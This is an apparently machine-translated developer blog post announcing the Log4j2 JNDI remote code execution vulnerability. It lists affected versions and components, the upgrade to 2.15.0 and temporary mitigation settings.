2

Ten hours ago, a remote code execution vulnerability in Apache Log4j2 was exposed on the Internet. An attacker can use this vulnerability to construct a special data request packet, which eventually triggers remote code execution. According to "white hat" analysis, almost all technology giants such as Baidu are the victims of the Log4j remote code execution vulnerability.

(According to the latest information from Apache, Log4j-2.15.0 is currently updated and approved on the release page, and the official release is in progress)

Since the Alibaba cloud security team officially reported the Apache Log4J2 remote code execution vulnerability on November 24, its dangerous vulnerability has continued to spread on the Internet. Because some functions of Apache Log4j2 have recursive analysis functions, attackers can directly construct malicious requests to trigger remote code execution vulnerabilities.

Apache Log4j2

Apache Log4j2 was originally written by Ceki Gülcü and is part of the Apache Log Service Project of the Apache Software Foundation. Log4j is one of several Java logging frameworks. And Apache Log4j2 is an upgrade to Log4j. Compared with its predecessor Log4j1, it has more significant improvements and fixes some inherent problems in the Logback architecture.

Through the Apache Log4j2 framework, developers can control the log generation process by defining the level of each log information.

At present, the log framework has been widely used in business system development to record log information. In most cases, developers may write error messages caused by user input into the log.

Vulnerability description

The detailed information of the Apache Log4j2 remote code execution vulnerability has been disclosed. After analysis, the Apache Log4j remote code execution vulnerability is due to the Java JNDI injection vulnerability in the component: when the program logs the data entered by the user, the attacker By constructing a special request to trigger a remote code execution vulnerability in Apache Log4j2, this vulnerability can be used to execute arbitrary code on the target server.

Affected version:

Apache Log4j 2.x <= 2.14.1

Known affected applications and components:

  • srping-boot-strater-log4j2
  • Apache Solr
  • Apache Flink
  • Apache Druid

It is reported that the Apache Log4j2 remote code execution vulnerability risk has been rated as "high-risk" by the industry, and the vulnerability is huge and the threshold for exploitation is extremely low. It is reported that many components and large-scale applications such as Apache Solr, Apache Struts2, Apache Druid, Apache Flink, etc. have been affected, and it is necessary to take measures to prevent them as soon as possible.

solution

At present, Apache Log4j has released a new version to fix the vulnerability, affected users are requested to upgrade all related applications of Apache Log4j2 to the latest Log4j-2.15.0-rc2 version, and upgrade the applications and components that are known to be affected , Such as srping-boot-strater-log4j2, Apache Solr, Apache Flink, Apache Druid.

Temporary repair suggestions:

  • JVM parameter added -Dlog4j2.formatMsgNoLookups=true
  • log4j2.formatMsgNoLookups=True
  • FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS is set to true

Before, I don’t know how many times I heard about the log4j vulnerability. Now there is a new 0day that is maliciously disclosed, and the impact is extremely wide.

According to the public information of the payload, a large number of websites around the world have been "captured" by this vulnerability, such as Baidu:

And iCloud:

As soon as the vulnerability news came out, it attracted the attention of developers and security engineers in the java field in the industry.

renew:

According to the latest information from Apache, Log4j 2.15.0 has been updated on the release page:

<dependencies>
<dependency org="org.apache.logging.log4j" name="log4j-api" rev="2.15.0" />
<dependency org="org.apache.logging.log4j" name="log4j-core" rev="2.15.0" />
</dependencies>

Since the official release is in progress, the 2.15 version cannot be seen externally for the time being.

According to an Apache source, there are still 0 artifacts on Maven Central, and it may take several hours before the mirror server can be synchronized and officially adopted. For more follow-ups, we will continue to pay attention.

Reference link
https://github.com/apache/logging-log4j2
https://repository.apache.org/service/local/repositories/releases/content/org/apache/logging/log4j/log4j-core/2.15.0/log4j-core-2.15.0.jar


MissD
955 声望40 粉丝